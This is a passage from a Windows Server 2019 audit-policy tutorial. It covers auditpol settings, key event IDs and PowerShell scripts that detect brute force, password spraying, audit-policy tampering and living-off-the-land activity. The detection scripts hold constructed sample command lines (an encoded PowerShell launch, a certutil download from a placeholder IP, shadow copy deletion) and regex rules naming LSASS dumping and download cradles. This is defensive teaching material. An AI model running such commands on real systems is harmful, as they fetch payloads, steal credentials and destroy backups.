Introduction to Advanced Audit Policy
Advanced Audit Policy Configuration in Windows Server 2019 provides granular control over security auditing beyond the nine audit categories available in legacy audit policy settings. Using Advanced Audit Policy, administrators can enable individual subcategories independently, so specific events are audited without turning on entire categories that generate excessive log volume. Windows Server 2019 includes roughly 60 subcategories across 10 categories covering logon events, object access, process tracking, privilege use, account management, directory service events, and system events. Proper audit policy configuration is fundamental to security monitoring, incident response, and compliance with frameworks such as NIST SP 800-53, PCI DSS, ISO 27001, and HIPAA. It is also a favourite target of attackers: disabling a subcategory or clearing the Security log is a cheap way to blind defenders, so the policy itself must be monitored and enforced, not just set once.
Understanding Audit Policy Categories and Subcategories
The Advanced Audit Policy is organized into 10 categories:
Account Logon: credential validation (NTLM), Kerberos authentication service (TGT requests), Kerberos service ticket operations, and other account logon events. These are logged on the computer that holds the account, which for domain accounts is the domain controller.
Account Management: user, computer, security group, distribution group, and application group changes, plus other account management events such as password policy checks.
Detailed Tracking: process creation and termination, DPAPI activity, RPC events, Plug and Play events, and token right adjustments.
DS Access: Active Directory object access, directory service changes, replication, and detailed replication.
Logon/Logoff: logon, logoff, account lockout, special logon (administrative privileges assigned at logon), group membership at logon, Network Policy Server, IPsec main/quick/extended mode, and user/device claims.
Object Access: file system, registry, kernel object, SAM, file share, detailed file share, removable storage, handle manipulation, certification services, application-generated events, central policy staging, and Windows Filtering Platform connection and packet drop events.
Policy Change: audit policy, authentication policy, authorization policy, MPSSVC (Windows Firewall) rule-level policy, filtering platform policy, and other policy changes.
Privilege Use: sensitive privilege use, non-sensitive privilege use, and other privilege use events.
System: security state change, security system extension (new authentication packages or services), system integrity, IPsec driver, and other system events.
Global Object Access Auditing: a computer-wide SACL for the file system or the registry that applies to every object of that type without editing individual object SACLs.
Viewing Current Audit Policy
Check the current advanced audit policy configuration using auditpol:
auditpol /get /category:*
auditpol /get /category:"Logon/Logoff"
auditpol /get /subcategory:"Logon"
auditpol /get /subcategory:* | findstr /C:"Success" /C:"Failure" /C:"No Auditing"
Note that findstr has no | alternation and splits an unquoted-style search string on spaces, so a pattern like "Success|Failure|No Auditing" only ever matched the word Auditing; /C: makes each string a literal. For machine-readable output add /r to auditpol /get, which prints CSV with a Subcategory, Subcategory GUID, and Inclusion Setting column.
Export the current policy to a file for documentation, as a rollback point before making changes, or to re-apply on another host with auditpol /restore:
auditpol /backup /file:C:\AuditPolicy\CurrentPolicy.csv
Configuring Account Logon Auditing
Account logon events track credential validation on the computer that holds the account: the domain controller for domain accounts, the member server itself for local accounts. For domain authentication you therefore collect these from every DC, not from the server being logged on to. They are critical for detecting brute force attacks, password spraying, credential stuffing, and unauthorized access. Enable success and failure auditing for all account logon subcategories (Other Account Logon Events currently generates no events, so enabling it costs nothing):
auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable
Key event IDs generated: 4768 (Kerberos TGT requested; failures carry a Result Code such as 0x6 unknown user or 0x12 disabled/locked), 4769 (Kerberos service ticket requested), 4770 (service ticket renewed), 4771 (Kerberos pre-authentication failed, typically 0x18 for a bad password), 4776 (NTLM credential validation; Status 0x0 on success, an NTSTATUS such as 0xC000006A for a wrong password on failure). 4625 (logon failure) is not an Account Logon event: it belongs to the Logon/Logoff category and is written on the computer where the logon was attempted.
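The following is an added example, not code from the original article: it classifies Account Logon failures (4771 and failed 4776) by source into brute force (one account hammered from one source) and password spray (one source touching many accounts). The $sample records are constructed for the demo; Get-AccountLogonFailure shows how the same shape is pulled from a live Security log on a domain controller.

```powershell
# Added example, not from the original article: classify Account Logon failures into
# brute force (many failures against one account from one source) and password spray
# (one source failing against many accounts). The $sample records are constructed for
# the demo; Get-AccountLogonFailure shows the same shape pulled from a live Security log.

function Get-AccountLogonFailure {
    # 4771 = Kerberos pre-authentication failed (always a failure; carries IpAddress)
    # 4776 = NTLM credential validation (success and failure share the ID; carries Workstation)
    param([datetime]$Since = (Get-Date).AddHours(-1))
    $filter = @{ LogName = 'Security'; Id = @(4771, 4776); StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = @{}
        ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        if ($_.Id -eq 4776 -and $d['Status'] -eq '0x0') { return }   # successful NTLM validation, skip
        [pscustomobject]@{
            Time   = $_.TimeCreated
            Id     = $_.Id
            User   = $d['TargetUserName']
            # 4771 reports IPv4-mapped IPv6 (::ffff:10.0.0.5); 4776 only has the workstation name
            Source = if ($_.Id -eq 4771) { $d['IpAddress'] -replace '^::ffff:', '' } else { $d['Workstation'] }
        }
    }
}

function Find-AuthenticationAttack {
    param(
        [Parameter(Mandatory)][object[]]$Failures,
        [int]$BruteForceThreshold = 10,   # failures against one account from one source
        [int]$SprayThreshold = 5          # distinct accounts failing from one source
    )
    foreach ($src in ($Failures | Group-Object Source)) {
        $perUser = @($src.Group | Group-Object User)
        foreach ($u in ($perUser | Where-Object Count -ge $BruteForceThreshold)) {
            [pscustomobject]@{ Pattern = 'BruteForce'; Source = $src.Name; Accounts = $u.Name; Failures = $u.Count }
        }
        if ($perUser.Count -ge $SprayThreshold) {
            [pscustomobject]@{ Pattern = 'PasswordSpray'; Source = $src.Name; Accounts = ($perUser.Name -join ','); Failures = $src.Count }
        }
    }
}

# Constructed sample (not real log data): one account hammered from 10.0.0.5,
# six accounts tried once each from WS-09, and a single typo from WS-12.
$base = Get-Date '2024-03-01 02:00:00'
$sample = @(
    1..12 | ForEach-Object { [pscustomobject]@{ Time = $base.AddSeconds($_); Id = 4771; User = 'svc_backup'; Source = '10.0.0.5' } }
    'alice', 'bob', 'carol', 'dave', 'erin', 'frank' | ForEach-Object { [pscustomobject]@{ Time = $base.AddSeconds(60); Id = 4776; User = $_; Source = 'WS-09' } }
    [pscustomobject]@{ Time = $base.AddMinutes(5); Id = 4776; User = 'grace'; Source = 'WS-12' }
)
Find-AuthenticationAttack -Failures $sample | Format-Table -AutoSize
# Live use on a DC, last 15 minutes:
# Find-AuthenticationAttack -Failures @(Get-AccountLogonFailure -Since (Get-Date).AddMinutes(-15)) | Format-Table -AutoSize
```

The thresholds are deliberately simple per-window counts; a scheduled task that runs this every few minutes over a short -Since window is enough to catch a spray that a per-account lockout policy never triggers on, because no single account crosses the lockout threshold.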
Configuring Account Management Auditing
Account management events detect creation, modification, and deletion of user accounts, security groups, and computer accounts. These are essential for detecting unauthorized privilege escalation and account manipulation:
auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable
Key event IDs: 4720 (user account created), 4722 (account enabled), 4725 (account disabled), 4726 (account deleted), 4738 (user account changed), 4723 (password change attempted by the user), 4724 (password reset by an administrator), 4740 (account locked out), 4767 (account unlocked), 4728/4729 (member added to/removed from a security-enabled global group), 4732/4733 (security-enabled local group, which includes built-in groups such as Administrators), 4756/4757 (security-enabled universal group). For domain accounts and groups these are written on the domain controller that processed the change, so collect from every DC.
Configuring Logon and Logoff Auditing
Logon/Logoff events are among the most important for incident response, recording every interactive (type 2), network (type 3), batch (type 4), service (type 5), remote interactive/RDP (type 10), and cached (type 11) logon and logoff on the computer where the logon takes place. On domain controllers and file servers the Logon subcategory is dominated by type 3 network logons, so plan retention and forwarding accordingly; Logoff success adds little detection value and is the first thing to drop if volume is a problem. Enable comprehensive logon auditing:
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
auditpol /set /subcategory:"Logoff" /success:enable
auditpol /set /subcategory:"Account Lockout" /failure:enable
auditpol /set /subcategory:"Special Logon" /success:enable
auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
Key event IDs: 4624 (successful logon; LogonType and LogonProcessName say how), 4625 (failed logon; Status/SubStatus give the reason, e.g. 0xC000006A wrong password, 0xC0000064 unknown user, 0xC0000234 locked out), 4634 (logoff), 4647 (user-initiated logoff), 4648 (logon with explicit credentials, typical of runas and of lateral movement with stolen credentials), 4672 (special privileges assigned to a new logon, from Special Logon), 4627 (group membership of the logon, if the Group Membership subcategory is enabled). Note that 4740 (account locked out) is written by the User Account Management subcategory on the domain controller, not by Account Lockout; the Account Lockout subcategory itself produces a 4625 with Status 0xC0000234 on the computer where the locked account attempted to log on.
Configuring Object Access Auditing
Object Access auditing tracks access to files, folders, registry keys, and other securable objects. For File System and Registry you must both enable the subcategory and configure a System Access Control List (SACL) on the objects to audit; the policy alone produces nothing, and a SACL with the policy off produces nothing either. Enable the policy subcategories:
auditpol /set /subcategory:"File System" /success:enable /failure:enable
auditpol /set /subcategory:"Registry" /success:enable /failure:enable
auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
auditpol /set /subcategory:"SAM" /failure:enable
auditpol /set /subcategory:"Removable Storage" /success:enable /failure:enable
auditpol /set /subcategory:"File Share" /success:enable /failure:enable
auditpol /set /subcategory:"Detailed File Share" /failure:enable
Key event IDs: 4656 (handle to an object requested), 4663 (attempt to access an object; the event that shows the actual access and the process that made it), 4660 (object deleted), 4658 (handle closed), 5140 (network share accessed), 5145 (detailed file share; one event per access check, very high volume with Success enabled). File Share, Detailed File Share, and Removable Storage need no SACL; File System and Registry events appear only for objects whose SACL asks for auditing.
Configure a SACL on a sensitive folder using PowerShell to audit all access (run elevated; reading or writing a SACL requires SeSecurityPrivilege):
$acl = Get-Acl -Path "D:\SensitiveData" -Audit   # -Audit is required: without it the SACL is neither read nor written back
# Audit every right for everyone, success and failure, inherited by subfolders (ContainerInherit) and files (ObjectInherit).
# FullControl with Success on a busy folder writes a 4663 for every read; narrow the rights if volume becomes a problem.
$auditRule = New-Object System.Security.AccessControl.FileSystemAuditRule("Everyone", "FullControl", "ContainerInherit,ObjectInherit", "None", "Success,Failure")
$acl.AddAuditRule($auditRule)
Set-Acl -Path "D:\SensitiveData" -AclObject $acl
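As an added example (not code from the original article), the script below applies a narrower SACL than the FullControl rule above, checks both prerequisites (File System subcategory enabled, SACL present) before trusting that 4663 events will appear, and then generates one audited write and reads it back from the Security log. D:\SensitiveData is an assumed path; the function names are the example's own.

```powershell
# Added example, not from the original article: apply a targeted SACL and check both
# prerequisites (subcategory enabled, SACL present) before trusting that 4663 events
# will appear. D:\SensitiveData is an assumed path. Run elevated: reading or writing a
# SACL requires SeSecurityPrivilege. auditpol output is assumed to be English.

function Test-FileSystemAuditEnabled {
    # auditpol /r prints CSV: Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting
    $row = (auditpol /get /subcategory:"File System" /r) | Where-Object { $_ -match '\S' } | ConvertFrom-Csv
    return ($row.'Inclusion Setting' -ne 'No Auditing')
}

function Set-FolderAuditRule {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$Identity = 'Everyone',
        # Audit what changes data or control, not every read: FullControl + Success on a busy
        # folder writes a 4663 for each read and buries the events you care about.
        [System.Security.AccessControl.FileSystemRights]$Rights = 'WriteData,AppendData,Delete,DeleteSubdirectoriesAndFiles,ChangePermissions,TakeOwnership',
        [System.Security.AccessControl.AuditFlags]$Flags = 'Success,Failure'
    )
    $acl  = Get-Acl -Path $Path -Audit          # without -Audit the SACL is not read and Set-Acl cannot write it
    $rule = New-Object System.Security.AccessControl.FileSystemAuditRule -ArgumentList @(
        $Identity, $Rights,
        [System.Security.AccessControl.InheritanceFlags]'ContainerInherit,ObjectInherit',
        [System.Security.AccessControl.PropagationFlags]::None,
        $Flags
    )
    $acl.AddAuditRule($rule)
    Set-Acl -Path $Path -AclObject $acl
}

function Get-FolderAuditRule {
    param([Parameter(Mandatory)][string]$Path)
    (Get-Acl -Path $Path -Audit).Audit |
        Select-Object IdentityReference, FileSystemRights, AuditFlags, IsInherited
}

function Get-FolderAccessEvent {
    # 4663 = an attempt was made to access an object; ObjectName holds the full path
    param([Parameter(Mandatory)][string]$Path, [datetime]$Since = (Get-Date).AddHours(-1))
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = @{}
            ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
            if ($d['ObjectName'] -like "$Path*") {
                [pscustomobject]@{ Time = $_.TimeCreated; User = $d['SubjectUserName']; Object = $d['ObjectName']; Access = $d['AccessMask']; Process = $d['ProcessName'] }
            }
        }
}

$target = 'D:\SensitiveData'   # assumed path
if (-not (Test-FileSystemAuditEnabled)) {
    Write-Warning 'File System subcategory is set to No Auditing; the SACL alone produces no events'
}
Set-FolderAuditRule -Path $target
Get-FolderAuditRule -Path $target | Format-Table -AutoSize
# Generate one audited write and read it back from the Security log
Set-Content -Path (Join-Path $target 'audit-canary.txt') -Value (Get-Date)
Get-FolderAccessEvent -Path $target -Since (Get-Date).AddMinutes(-1) | Format-Table -AutoSize
```

The canary write at the end is the check most people skip: if it does not produce a 4663 within a minute, one of the two halves (policy or SACL) is not in effect, and no amount of SIEM tuning will fix that.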
Configuring Process Creation Auditing
Process Creation auditing (event ID 4688) records every new process with its image path, the account that started it, the parent process (ParentProcessName, available on Server 2016 and later), the token elevation type, and, once the policy below is enabled, the full command line. It is invaluable for detecting malware execution, lateral movement, and living-off-the-land attacks. Two caveats: without the command-line policy the CommandLine field is empty and 4688 loses most of its value, and with it enabled any secret passed on a command line (a password to net use, a connection string) lands in the Security log, so restrict who can read that log. Enable the subcategory:
auditpol /set /subcategory:"Process Creation" /success:enable
auditpol /set /subcategory:"Process Termination" /success:enable
Enable command line logging in process creation events via Group Policy: Computer Configuration > Administrative Templates > System > Audit Process Creation > Include command line in process creation events = Enabled. Or via the registry (the GPO writes the same value):
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v "ProcessCreationIncludeCmdLine_Enabled" /t REG_DWORD /d 1 /f
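The following is an added example and not part of the original article: it verifies that command-line capture is on, pulls 4688 events into a flat shape, and runs a small set of living-off-the-land rules over them. The $sample records are constructed (the base64 in the first one is just "IEX (New-Object" in UTF-16LE), the rule list is a starting point rather than a complete detection set, and the function names are the example's own.

```powershell
# Added example, not from the original article: verify that command-line capture is
# on, then run a small set of living-off-the-land rules over 4688 events. The
# $sample records are constructed; Get-ProcessCreationEvent is the live equivalent.

function Test-CommandLineLoggingEnabled {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
    $v = Get-ItemProperty -Path $key -Name ProcessCreationIncludeCmdLine_Enabled -ErrorAction SilentlyContinue
    return [bool]($v -and $v.ProcessCreationIncludeCmdLine_Enabled -eq 1)
}

function Get-ProcessCreationEvent {
    param([datetime]$Since = (Get-Date).AddHours(-24))
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = @{}
            ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                Process     = $d['NewProcessName']
                Parent      = $d['ParentProcessName']   # populated on Server 2016 and later
                CommandLine = $d['CommandLine']        # empty unless the policy above is enabled
            }
        }
}

# Each rule is a case-insensitive regex over the command line. Tune to your environment;
# these are starting points, not a complete detection set.
$LolbinRules = @(
    @{ Name = 'Encoded PowerShell';         Pattern = 'powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s' }
    @{ Name = 'PowerShell download cradle'; Pattern = 'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b' }
    @{ Name = 'certutil download/decode';   Pattern = 'certutil(\.exe)?.*\s-(urlcache|decode)\b' }
    @{ Name = 'mshta/rundll32 script';      Pattern = '(mshta|rundll32)(\.exe)?.*(javascript:|vbscript:|\.hta\b|\.sct\b)' }
    @{ Name = 'regsvr32 remote scriptlet';  Pattern = 'regsvr32(\.exe)?.*/i:https?://' }
    @{ Name = 'LSASS dump via comsvcs';     Pattern = 'comsvcs\.dll.*MiniDump' }
    @{ Name = 'Shadow copy deletion';       Pattern = 'vssadmin(\.exe)?.*delete\s+shadows|wmic.*shadowcopy\s+delete' }
)

function Find-SuspiciousProcess {
    param([Parameter(Mandatory)][object[]]$Events, [object[]]$Rules = $LolbinRules)
    foreach ($e in $Events) {
        foreach ($r in $Rules) {
            if ($e.CommandLine -imatch $r.Pattern) {
                [pscustomobject]@{ Time = $e.Time; Rule = $r.Name; User = $e.User; CommandLine = $e.CommandLine }
            }
        }
        # Office applications have no business launching script hosts or shells
        if ($e.Parent -imatch '\\(winword|excel|powerpnt|outlook)\.exe$' -and
            $e.Process -imatch '\\(cmd|powershell|pwsh|wscript|cscript|mshta)\.exe$') {
            [pscustomobject]@{ Time = $e.Time; Rule = 'Office spawned shell'; User = $e.User; CommandLine = $e.CommandLine }
        }
    }
}

if (-not (Test-CommandLineLoggingEnabled)) {
    Write-Warning '4688 will not carry command lines until ProcessCreationIncludeCmdLine_Enabled = 1'
}

# Constructed sample (not real log data): a macro-launched encoded PowerShell, a certutil
# download, a benign svchost start, and a shadow copy wipe.
$t = Get-Date '2024-03-01 09:15:00'
$sample = @(
    [pscustomobject]@{ Time = $t;                User = 'CORP\jdoe';          Process = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; Parent = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; CommandLine = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
    [pscustomobject]@{ Time = $t.AddSeconds(30); User = 'CORP\jdoe';          Process = 'C:\Windows\System32\certutil.exe'; Parent = 'C:\Windows\System32\cmd.exe';      CommandLine = 'certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.txt' }
    [pscustomobject]@{ Time = $t.AddMinutes(2);  User = 'NT AUTHORITY\SYSTEM'; Process = 'C:\Windows\System32\svchost.exe';  Parent = 'C:\Windows\System32\services.exe'; CommandLine = 'C:\Windows\System32\svchost.exe -k netsvcs -p' }
    [pscustomobject]@{ Time = $t.AddMinutes(3);  User = 'CORP\admin';         Process = 'C:\Windows\System32\vssadmin.exe';  Parent = 'C:\Windows\System32\cmd.exe';      CommandLine = 'vssadmin.exe delete shadows /all /quiet' }
)
Find-SuspiciousProcess -Events $sample | Format-Table -AutoSize
# Live: Find-SuspiciousProcess -Events @(Get-ProcessCreationEvent -Since (Get-Date).AddHours(-24)) | Format-Table -AutoSize
```

The parent/child rule is the one that still works when an attacker avoids every string in the list: a Word document starting powershell.exe is suspicious regardless of what the command line says, and it is only visible because 4688 carries ParentProcessName.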
Configuring Policy Change Auditing
Policy change events detect modifications to the audit policy itself, to authentication policy (Kerberos policy, domain trusts), and to authorization policy (user rights and object permissions). They are essential for detecting an attacker who disables auditing before acting, and for catching privilege escalation through user-right grants. One caveat: Authorization Policy Change with Success generates 4703 (token right adjusted) at very high volume on Server 2016 and later because of routine service activity; enable it only if your collector can filter that event.
auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
auditpol /set /subcategory:"Authentication Policy Change" /success:enable
auditpol /set /subcategory:"Authorization Policy Change" /success:enable
auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:enable /failure:enable
auditpol /set /subcategory:"Filtering Platform Policy Change" /success:enable /failure:enable
Key event IDs: 4719 (system audit policy changed; the AuditPolicyChanges field says which settings were added or removed), 4907 (auditing settings on an object changed), 4715 (audit policy on an object changed), 4706/4707 (domain trust created/removed), 4713 (Kerberos policy changed), 4670 (permissions on an object changed, from Authorization Policy Change), 4703 (token right adjusted). Also watch 1102 (audit log cleared), which is logged regardless of policy and is a classic tamper indicator.
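As an added example (not from the original article), the script below decodes a 4719 event into who changed which subcategory and how. The AuditPolicyChanges field holds resource-string codes rather than text, and the subcategory arrives as a GUID, so the example resolves both; the XML is a constructed 4719 body and the function names are the example's own.

```powershell
# Added example, not from the original article: decode 4719 (system audit policy
# changed) into who changed which subcategory and how. The XML below is a constructed
# 4719 body; Get-AuditPolicyChange reads real events and resolves the subcategory GUID
# with auditpol's CSV report.

# AuditPolicyChanges holds resource-string codes, not text
$AuditChangeCode = @{
    '%%8448' = 'Success removed'
    '%%8449' = 'Success added'
    '%%8450' = 'Failure removed'
    '%%8451' = 'Failure added'
}

function Get-SubcategoryNameMap {
    # auditpol /get /category:* /r emits CSV with Subcategory and Subcategory GUID columns
    $map = @{}
    (auditpol /get /category:* /r) | Where-Object { $_ -match '\S' } | ConvertFrom-Csv |
        ForEach-Object { $map[$_.'Subcategory GUID'.ToUpper()] = $_.Subcategory }
    return $map
}

function ConvertFrom-AuditPolicyChangeEvent {
    param([Parameter(Mandatory)][xml]$EventXml, [hashtable]$NameMap = @{})
    $d = @{}
    $EventXml.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
    $guid    = $d['SubcategoryGuid'].ToUpper()
    $changes = ($d['AuditPolicyChanges'] -split ',\s*') | ForEach-Object {
        if ($AuditChangeCode.ContainsKey($_)) { $AuditChangeCode[$_] } else { $_ }
    }
    [pscustomobject]@{
        # A change pushed by Group Policy shows SYSTEM as the subject; a person or script
        # running auditpol shows their account, which is the case worth alerting on.
        Actor       = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
        Subcategory = if ($NameMap.ContainsKey($guid)) { $NameMap[$guid] } else { $guid }
        Change      = ($changes -join '; ')
    }
}

function Get-AuditPolicyChange {
    param([datetime]$Since = (Get-Date).AddDays(-7))
    $map = Get-SubcategoryNameMap
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4719; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            ConvertFrom-AuditPolicyChangeEvent -EventXml ([xml]$_.ToXml()) -NameMap $map |
                Add-Member -NotePropertyName Time -NotePropertyValue $_.TimeCreated -PassThru
        }
}

# Constructed sample (not a real event): someone turned Logon auditing off entirely.
$sampleXml = [xml]@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4719</EventID></System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-1-2-3-1105</Data>
    <Data Name="SubjectUserName">jdoe</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="SubjectLogonId">0x3e7a1</Data>
    <Data Name="CategoryId">%%8273</Data>
    <Data Name="SubcategoryId">%%12544</Data>
    <Data Name="SubcategoryGuid">{0CCE9215-69AE-11D9-BED3-505054503030}</Data>
    <Data Name="AuditPolicyChanges">%%8448, %%8450</Data>
  </EventData>
</Event>
'@
# GUID-to-name map supplied inline so the demo runs without auditpol; live code uses Get-SubcategoryNameMap
ConvertFrom-AuditPolicyChangeEvent -EventXml $sampleXml -NameMap @{ '{0CCE9215-69AE-11D9-BED3-505054503030}' = 'Logon' } | Format-List
# Live: Get-AuditPolicyChange -Since (Get-Date).AddDays(-30) | Format-Table -AutoSize
```

A 4719 whose Actor is a normal user account and whose Change contains "removed" is the alert worth paging on; GPO-driven changes show SYSTEM and are expected at policy rollouts.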
Deploying Audit Policy via Group Policy
Use Group Policy to deploy and enforce advanced audit policy settings across multiple servers. In Group Policy Management, create or edit a GPO and navigate to Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies, and configure each subcategory. Link the GPO to the Servers OU and mark the link Enforced so a lower-precedence GPO cannot override it. Keep a separate, stricter GPO for domain controllers, which have a different volume profile and are where Account Logon, DS Access, and Account Management events land. Then refresh and verify on a member (gpresult /r lists which GPOs applied; the HTML report shows the resulting audit settings under Computer Details > Settings; the last line is PowerShell, since the $(Get-Date) subexpression is not valid in cmd.exe):
gpupdate /force
gpresult /r /scope computer
gpresult /scope computer /h C:\Reports\GPResult.html
auditpol /get /category:* | Out-File C:\Reports\AuditPolicy_$(Get-Date -Format yyyyMMdd).txt
Make sure the legacy category settings can never override the subcategory settings: enable the security option "Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings" (Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options). It sets HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SCENoApplyLegacyAuditPolicy to 1. Once advanced audit policy is delivered by GPO, any local auditpol /set change survives only until the next policy refresh, so treat the GPO as the source of truth and the local policy as something to verify, not edit. The same security option can be applied from a security template (.inf) with secedit:
secedit /configure /db secedit.sdb /cfg "C:\Templates\AuditPolicy.inf" /areas SECURITYPOLICY /overwrite /quiet
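The following is an added example (not the article's own code) that serves both the viewing step earlier and the verify-after-GPO step here: it reads the effective policy from auditpol's CSV output and compares it with a baseline, reporting any subcategory that drifted. The $Baseline is an assumption for the demo, built from the settings this article enables; the $snapshot it is compared with is a constructed result, and the function names are the example's own.

```powershell
# Added example, not from the original article: compare the effective audit policy with a
# baseline and report drift. The baseline below is an assumption for the demo, built from
# the settings this article enables; adjust it to your own standard. auditpol output is
# assumed to be English.

$Baseline = @{
    'Credential Validation'           = 'Success and Failure'
    'Kerberos Authentication Service' = 'Success and Failure'
    'User Account Management'         = 'Success and Failure'
    'Security Group Management'       = 'Success and Failure'
    'Logon'                           = 'Success and Failure'
    'Logoff'                          = 'Success'
    'Account Lockout'                 = 'Failure'
    'Special Logon'                   = 'Success'
    'Process Creation'                = 'Success'
    'Audit Policy Change'             = 'Success and Failure'
    'File System'                     = 'Success and Failure'
}

function Get-EffectiveAuditPolicy {
    # /r prints CSV: Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting
    # The first output line is blank, so drop whitespace-only lines before parsing.
    $map = @{}
    (auditpol /get /category:* /r) | Where-Object { $_ -match '\S' } | ConvertFrom-Csv |
        ForEach-Object { $map[$_.Subcategory.Trim()] = $_.'Inclusion Setting'.Trim() }
    return $map
}

function Compare-AuditPolicy {
    param([Parameter(Mandatory)][hashtable]$Expected, [Parameter(Mandatory)][hashtable]$Actual)
    foreach ($name in ($Expected.Keys | Sort-Object)) {
        $have = if ($Actual.ContainsKey($name)) { $Actual[$name] } else { '<missing>' }
        [pscustomobject]@{
            Subcategory = $name
            Expected    = $Expected[$name]
            Actual      = $have
            Compliant   = ($have -eq $Expected[$name])
        }
    }
}

# Constructed snapshot (not real output): a host where someone turned Logon auditing
# down to Failure only and Process Creation was never enabled.
$snapshot = @{
    'Credential Validation' = 'Success and Failure'; 'Kerberos Authentication Service' = 'Success and Failure'
    'User Account Management' = 'Success and Failure'; 'Security Group Management' = 'Success and Failure'
    'Logon' = 'Failure'; 'Logoff' = 'Success'; 'Account Lockout' = 'Failure'; 'Special Logon' = 'Success'
    'Process Creation' = 'No Auditing'; 'Audit Policy Change' = 'Success and Failure'; 'File System' = 'Success and Failure'
}
Compare-AuditPolicy -Expected $Baseline -Actual $snapshot | Where-Object { -not $_.Compliant } | Format-Table -AutoSize

# Live check, suitable for a scheduled task or a CI job (non-zero exit on drift):
# $drift = Compare-AuditPolicy -Expected $Baseline -Actual (Get-EffectiveAuditPolicy) | Where-Object { -not $_.Compliant }
# if ($drift) { $drift | Format-Table -AutoSize; exit 1 }
```

Running the live check a few minutes after each Group Policy refresh catches both failure modes that matter: a GPO that silently stopped applying, and a local auditpol /set that someone ran and nobody reverted.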
Querying Security Events with PowerShell
Use PowerShell to query the Security event log for specific events of interest. Get-WinEvent with -FilterHashtable filters inside the event log service, which is much faster than reading everything and piping through Where-Object. Find all failed logon attempts in the last 24 hours:
$startTime = (Get-Date).AddHours(-24)
# -ErrorAction SilentlyContinue: Get-WinEvent raises an error, not an empty result, when nothing matches
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625; StartTime=$startTime} -ErrorAction SilentlyContinue | ForEach-Object {
    $xml = [xml]$_.ToXml()
    # Collapse the <Data Name="..."> elements into a name/value table instead of scanning them once per field
    $data = @{}
    $xml.Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
    [PSCustomObject]@{
        Time      = $_.TimeCreated
        User      = $data['TargetUserName']
        IP        = $data['IpAddress']
        LogonType = $data['LogonType']
        Status    = $data['Status']   # NTSTATUS, e.g. 0xC000006D bad user name or password, 0xC0000234 account locked out
    }
} | Sort-Object User | Format-Table -AutoSize
Find all accounts added to privileged groups in the last 7 days. Without a filter on the group name the query returns every security group addition, so the second line matches the Group Name field in the message text against the groups you care about:
$privileged = 'Domain Admins|Enterprise Admins|Schema Admins|Administrators|Account Operators|Backup Operators'
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=@(4728,4732,4756); StartTime=(Get-Date).AddDays(-7)} -ErrorAction SilentlyContinue | Where-Object { $_.Message -match "Group Name:\s+($privileged)\s" } | Select-Object TimeCreated, Message | Format-List
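As an added example (not code from the original article), the script below does the privileged-group check from the Account Management section and the query above properly: it parses the 4728/4732/4756 add events and the matching 4729/4733/4757 remove events into structured fields (group, member, who made the change) instead of regex-matching the rendered message, which breaks on localized systems. The privileged group list is an assumption, the XML is a constructed 4728 body, and the function names are the example's own.

```powershell
# Added example, not from the original article: pull group-membership changes
# (4728/4732/4756 adds, 4729/4733/4757 removes) as structured records and keep only
# the groups you treat as privileged. The group list is an assumption; the XML is
# a constructed 4728 body.

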